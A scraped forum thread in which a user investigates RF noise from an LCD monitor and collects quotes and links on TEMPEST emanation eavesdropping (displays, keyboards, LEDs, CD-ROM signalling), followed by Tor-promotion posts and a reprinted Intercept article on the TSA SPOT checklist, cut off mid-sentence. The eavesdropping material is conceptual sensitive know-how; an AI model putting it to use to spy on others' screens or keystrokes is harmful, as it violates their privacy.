"You are under the wrong impression that somehow RF hash from the back light can somehow carry data. A liquid crystal display (LCD) does not generate its own light like a CRT or plasma screen and requires a light source to make the display visible. Even those that do cannot transmit computer data being none reaches the monitor."

The LCD is connected to a tower, which other devices connect to. Under testing I've heard the CDROM drive accessing data noises within the FRS channels, along with mouse movements and keyboard activity, along with other noises. When I disable the LCD monitor, all of these disturbances vanish. This means the weakness is in the monitor, and my tower is well shielded or shielded enough so as not to generate any noise in radios I can notice. The reference I made to the strange tape and material within the back side of the LCD monitor at the top could be a sign of some type of antenna or device for amping.

"Their FRS radios will only hear what yours does, RF hash, no data whatsoever THAT IS if one is standing outside your house tapping the radio and scratching his head wondering what's the matter with his radio. You and only you know what it is and where it's coming from."

And what of experienced and curious sysadmins? Rogue crackers? Bored HAMs?
Are there any remote radio injection attacks against systems? This is something I'll research later, as I do believe it was mentioned in at least one whitepaper on side channel attacks.

"Thanks for the chuckles, if the report reveals secrets it would not be published but sent by secret courier to the KGB in Moscow."

I'm not aware of any secrets revealed within the document. But it did raise an interesting point without exposing the method(s) delivered to us from an interesting party. This wasn't just some random article written by some anonymous, disturbed fellow and posted to a pastebin or conspiracy minded blog or forum. And one cannot deny the dozens of TEMPEST attacks available today.

"So... all this and no word on moving the radio farther from the monitor. Why don't you try talking somewhere besides in front of the computer if it bothers you so much?"

Thank you for considering conversation as my reason for posting this, but it is not. I would not choose a noisy channel to talk on. Clear conversation is not the point of this thread. I desire the elimination of this garbage coming from the LCD monitor. I don't care if no one in the world can pick up on it and hear it, I would like to properly resolve it and not ignore it.

One can also dredge up the subject of EMF on health, too, but I have not experienced any disturbance of health from exposure to this noise and most people would argue any possible EMF effects on health to be one of one's over active imagination and not real world application.

[-]

A continued discussion was posted elsewhere, this may be useful in the voyage to remove this "noise":

[-]

In addition, my CDROM drive light blinks once every second, sometimes with a second or 1/2 second in between, and I found this:

[-]

http://catless.ncl.ac.uk/Risks/19.60.html#subj9

"I'd worry about a Tempest virus that polled a personal computer's
CD-ROM drive to pulse the motor as a signalling method:

* Modern high-speed CD-ROM drive motors are both acoustically and
electrically noisy, giving you two attack methods for the price of one;

* Laptop computer users without CRTs, and the PC users that can afford
large LCD screens instead of CRTs, often have CD-ROM drives;

* Users are getting quite used to sitting patiently while their
CD-ROM drives grind away for no visibly obvious reason (but
that's quite enough about the widespread installs of software from
Microsoft CD-ROMs that prompted Kuhn's investigation in the first place.)"

[-]


Any comments on the silver tape and material inside the back of the LCD?

...Disconnection of the LED CDROM and HDD lights could be something I should do to relieve one possible issue.

[-]

Some articles with examples:

"If everything is just right, you can pick up signals from some distance. "I was able to eavesdrop certain laptops through three walls," says Kuhn. "At the CEBIT conference, in 2006, I was able to see the Powerpoint presentation from a stand 25 metres away."

uhn also mentioned that one laptop was vulnerable because it had metal hinges that carried the signal of the display cable. I asked if you could alter a device to make it easier to spy on. "There are a lot of innocuous modifications you can make to maximise the chance of getting a good signal," he told me. For example, adding small pieces of wire or cable to a display could make a big difference.

As for defending against this kind of attack, Kuhn says using well-shielded cables, certain combinations of colours and making everything a little fuzzy all work."

- http://www.newscientist.com/blog/technology/2007/...

=!==-!=
TO EASILY VIEW THE PDF files below:
=!==-!=

Online viewer for PDF, PostScript and Word:

"This is an online viewer, with which you can view PDF and PostScript files as browsable images and Word documents as web pages. Given a URL on the net or a file on your computer, the viewer will try to retrieve the document, convert it and show it to you. No plugin software is required."

http://view.samurajdata.se/

The viewer software is open source, licensed under the GNU Public License.
=!==-!=

Electromagnetic eavesdropping risks of flat-panel displays
http://www.cl.cam.ac.uk/~mgk25/pet2004-fpd.pdf

=

Eavesdropping attacks on computer displays
- http://www.cl.cam.ac.uk/~mgk25/...

=

Compromising emanations: eavesdropping risks of computer displays
- http://www.cl.cam.ac.uk/techreports/...
- http://www.cl.cam.ac.uk/techreports/...

=

Compromising emanations of LCD TV sets
- http://www.cl.cam.ac.uk/~mgk25/emc2011-tv.pdf

=

"Q: Can I use filtered fonts also on flat-panel displays

My experience so far has been that with LCDs, the video cable is the most significant source of radiated information leakage. Where an analogue video cable (with 15-pin VGA connector) is used, low-pass filtered fonts have the same benefits as with CRTs. Where a purely digital video cable is used (DVI-D, laptop-internal displays with FPD/LVDS links, etc.) only the last step, namely randomizing the least-significant bits, should be implemented.

Where the video signal is entirely encoded in digital form, the low-pass filtered step will not have the desired effect. In fact, it can actually increase the differences between the signal generated by individual characters, and thereby make automatic radio character recognition more reliable."

- http://www.cl.cam.ac.uk/~mgk25/emsec/...

=

Remotely Eavesdropping on Keyboards (and read the comments!)

"The researchers from the Security and Cryptography Laboratory at Ecole Polytechnique Federale de Lausanne are able to capture keystrokes by monitoring the electromagnetic radiation of PS/2, universal serial bus, or laptop keyboards. They've outline four separate attack methods, some that work at a distance of as much as 65 feet from the target.

In one video demonstration, researchers Martin Vuagnoux and Sylvain Pasini sniff out the the keystrokes typed into a standard keyboard using a large antenna that's about 20 to 30 feet away in an adjacent room."

- https://www.schneier.com/blog/archives/2008/10/remotely_eavesd.html

=

Video eavesdropping demo at CeBIT 2006
- http://www.lightbluetouchpaper.org/2006/03/09/...

=

Optical Emission Security – Frequently Asked Questions

"Q: What about LEDs?

For devices with RS-232 serial ports, it is customary to provide a status indicator LED for some of the signal lines (in particular transmit data and receive data). Often, these LEDs are directly connected to the line via just a resistor. As a result, anyone with a line of sight to the LED, some optics and a simple photosensor can see the data stream. Joe Loughry and David A. Umphress have recently announced a detailed study (submitted to ACM Transactions on Information and System Security) in which they tested 39 communications devices with 164 LED indicators, and on 14 of the tested devices they found serial port data in the LED light. Based on their findings, it seems reasonable to conclude that LEDs for RS-232 ports are most likely carrying the data signal today, whereas LEDs on high-speed data links (LANs, harddisk) do not. Even these LEDs are still available as a covert channel for malicious software that actively tries to transmit data optically.

I expect that this paper will cause a number of modem manufacturers to add a little pulse stretcher (monostable multivibrator) to the LEDs in the next chip set revision, and that at some facilities with particular security concerns, the relevant LEDs will be removed or covered with black tape.

The data traffic on LEDs is not a periodic signal, and therefore, unlike with video signals, periodic averaging cannot be used to improve the signal-to-noise ratio. The shot-noise limit estimation technique that I used to estimate the CRT eavesdropping risk can even more easily (because no deconvolution is needed) also be applied to serial port indicators and allows us to estimate a lower bound for the bit-error rate at a given distance. I have performed a few example calculations and concluded that with a direct line of sight, and a 100 kbit/s signal (typical for an external telephone modem), at 500 m distance it should be no problem to acquire a reliable signal (one wrong bit every 10 megabit), whereas for indirect reflection from the wall of a dark room, a somewhat more noisy signal (at least one wrong bit per 10 kilobit) can be expected to be receivable in a few tens of meters distance.

- http://www.cl.cam.ac.uk/~mgk25/emsec/...

=

Ancient Story on Slashdot: Coming to a Desktop near you: Tempest Capabilities

"New Scientist has an interesting article about a new toy we will all want. It's a card that plugs in one of your PCI slots and allows you to scan the EMF spectrum and read your neighbours terminal. In about 5 years you might be able to get one for just under £1000. (Modern Tempest Hardware costs about £30000) "

http://www.yro.slashdot.org/story/99/11/08/...

=

"Any unshielded electrical device with a variable current (including LCDs) will give out EMF radiation. It's the nature of the beast.

For that matter, light is EMF radiation, so unless you have your LCD in a coal-mine, it's reflecting EMF all the time it's switched on.

Then, there's the fact that screen monitoring isn't the only monitoring you can do. I used to use a radio, tuned into the bus for the PET, as a sound card. Worked surprisingly well, for all that very clunky metal shielding. What's to stop a much higher-quality receiver from seeing the data, in an unshielded box, being sent TO the LCD, or to any other device on the machine?

It's a mistake to assume that Tempest technology is single-function and that that single-function only works in a single situation."

- http://slashdot.org/comments.pl?...

=

800Mbps Wireless Network Made With LED Light Bulbs
- http://science.slashdot.org/story/11/08/02/...

=

There are a lot of other files, many in PPT format, which can be found easily on this subject of LCD monitor (and other computing devices) TEMPEST sniffing.

===

Sources for this discussion:

- http://forums.radioreference.com/computer/...
- http://clsvtzwzdgzkjda7.onion/viewtopic.php?...

.onion link above requires a running Tor client session in order to view. (https://www.torproject.org)

This on-going discussion backed up to Pastebin(s) in order to retain it as an artifact. Many of these
types of discussions are REMOVED from the net because of the nature of the discussion (TEMPEST).

__________________
Test your connection for leaks:
http://ip-check.info/?lang=en

Use TAILS
https://tails.boum.org/

How to boot from USB and other great stuff:
http://www.rmprepusb.com/

Open pdf and word files online instead of on your puter'
http://view.samurajdata.se/

USE the net more securely:
https://pressfreedomfoundation.org/blog/2014/04/help-support-little-known-privacy-tool-has-been-critical-journalists-reporting-nsa
https://www.torproject.org/download/download

http://www.theintelligencenews.com/


"The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes......"



"There's a war out there, old friend. A world war. And it's not about who's got the most bullets. It's about who controls the information.... it's all about the information!"
0
hannah

Registered:
Posts: 797
Reply with quote  #10 
EVERYONE PLEASE USE TOR AND HELP THE NETWORK GROW BY BECOMING A TOR RELAY OR BRIDGE - DEFEAT CENSORSHIP AND POLITICAL OPPRESSION

BESIDES MAKING YOUR COMMUNICATIONS MORE SECURE, YOU CAN HELP OTHERS



You will help the network speed up bandwidth.
You will help people living under oppressive political regimes have freedom of speech and communications.
You can help cause regime change in China, Iran and Syria.
A non-exit TOR Relay allows encrypted data to flow through the network smoothly and it starts automatically when you log in. It does not affect your normal use of TOR.

Download here:

https://www.torproject.org/download/download


Use the Vidalia bundle for your personal encrypted web surfing

Use the relay bundle or bridge bundle TO HELP EXPAND THE NETWORK

__________________
Test your connection for leaks:
http://ip-check.info/?lang=en

Use TAILS
https://tails.boum.org/

How to boot from USB and other great stuff:
http://www.rmprepusb.com/

Open pdf and word files online instead of on your puter'
http://view.samurajdata.se/

USE the net more securely:
https://pressfreedomfoundation.org/blog/2014/04/help-support-little-known-privacy-tool-has-been-critical-journalists-reporting-nsa
https://www.torproject.org/download/download

http://www.theintelligencenews.com/


"The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes......"



"There's a war out there, old friend. A world war. And it's not about who's got the most bullets. It's about who controls the information.... it's all about the information!"
0
joeb

Registered:
Posts: 8,748
Reply with quote  #11 

https://firstlook.org/theintercept/2015/03/27/revealed-tsas-closely-held-behavior-checklist-spot-terrorists/



Exclusive: TSA’s Secret Behavior Checklist to Spot Terrorists

Friday April 3 2015

Featured photo - Exclusive: TSA’s Secret Behavior Checklist to Spot Terrorists

Fidgeting, whistling, sweaty palms. Add one point each. Arrogance, a cold penetrating stare, and rigid posture, two points.

These are just a few of the suspicious signs that the Transportation Security Administration directs its officers to look out for — and score — in airport travelers, according to a confidential TSA document obtained exclusively by The Intercept.

The checklist is part of TSA’s controversial program to identify potential terrorists based on behaviors that it thinks indicate stress or deception — known as the Screening of Passengers by Observation Techniques, or SPOT. The program employs specially trained officers, known as Behavior Detection Officers, to watch and interact with passengers going through screening.

The document listing the criteria, known as the “Spot Referral Report,” is not classified, but it has been closely held by TSA and has not been previously released. A copy was provided to The Intercept by a source concerned about the quality of the program.

The checklist ranges from the mind-numbingly obvious, like “appears to be in disguise,” which is worth three points, to the downright dubious, like a bobbing Adam’s apple. Many indicators, like “trembling” and “arriving late for flight,” appear to confirm allegations that the program picks out signs and emotions that are common to many people who fly.

A TSA spokesperson declined to comment on the criteria obtained by The Intercept. “Behavior detection, which is just one element of the Transportation Security Administration’s (TSA) efforts to mitigate threats against the traveling public, is vital to TSA’s layered approach to deter, detect and disrupt individuals who pose a threat to aviation,” a spokesperson said in an emailed statement.

Since its introduction in 2007, the SPOT program has attracted controversy for the lack of science supporting it. In 2013, the Government Accountability Office found that there was no evidence to back up the idea that “behavioral indicators … can be used to identify persons who may pose a risk to aviation security.” After analyzing hundreds of scientific studies, the GAO concluded that “the human ability to accurately identify deceptive behavior based on behavioral indicators is the same as or slightly better than chance.”

The inspector general of the Department of Homeland Security found in 2013 that TSA had failed to evaluate SPOT, and “cannot ensure that passengers at United States airports are screened objectively, show that the program is cost-effective, or reasonably justify the program’s expansion.”

Despite those concerns, TSA has trained and deployed thousands of Behavior Detection Officers, and the program has cost more than $900 million since it began in 2007, according to the GAO.

The 92-point checklist listed in the “Spot Referral Report” is divided into various categories with a point score for each. Those categories include a preliminary “observation and behavior analysis,” and then those passengers pulled over for additional inspection are scored based on two more categories: whether they have “unusual items,” like almanacs and “numerous prepaid calling cards or cell phones,” and a final category for “signs of deception,” which include “covers mouth with hand when speaking” and “fast eye blink rate.

Points can also be deducted from someone’s score based on observations about the traveler that make him or her less likely, in TSA’s eyes, to be a terrorist. For example, “apparent” married couples, if both people are over 55, have two points deducted off their score. Women over the age of 55 have one pointed deducted; for men, the point deduction doesn’t come until they reach 65.

Last week, the ACLU sued TSA to obtain records related to its behavior detection programs, alleging that they lead to racial profiling. The lawsuit is based on a Freedom of Information Act request the ACLU filed last November asking for numerous documents related to the program, including the scientific justification for the program, changes to the list of behavior indicators, materials used to train officers and screen passengers, and what happens to the information collected on travelers.

“The TSA has insisted on keeping documents about SPOT secret, but the agency can’t hide the fact that there’s no evidence the program works,” said Hugh Handeyside, staff attorney with the ACLU National Security Project, in a statement announcing the lawsuit.

Being on the lookout for suspicious behavior is a “common sense approach” that is used by law enforcement, according to TSA. “No single behavior alone will cause a traveler to be referred to additional screening or will result in a call to a law enforcement officer (LEO),” the agency said in its emailed statement. “Officers are trained and audited to ensure referrals for additional screening are based only on observable behaviors and not race or ethnicity.”

One former Behavior Detection Officer manager, who asked not to be identified, said that SPOT indicators are used by law enforcement to justify pulling aside anyone officers find suspicious, rather than acting as an actual checklist for specific indicators. “The SPOT sheet was designed in such a way that virtually every passenger will exhibit multiple ‘behaviors’ that can be assigned a SPOT sheet value,” the former manager said.

The signs of deception and fear “are ridiculous,” the source continued. “These are just ‘catch all’ behaviors to justify BDO interaction with a passenger. A license to harass.”

The observations of a TSA screener or a Behavior Detection Officer shouldn’t be the basis for referring someone to law enforcement. “The program is flawed and unnecessarily delays and harasses travelers. Taxpayer dollars would be better spent funding real police at TSA checkpoints,” the former manager said.

A second former Behavior D
0
Previous Topic | Next Topic
Print
Reply

Easily create a Forum Website with Website Toolbox.

? ?
Copyright ? 2001-2004 Who?s A Rat. All Rights Reserved.
Reproduction in whole or in part in any form or medium without express written permission is prohibited.
?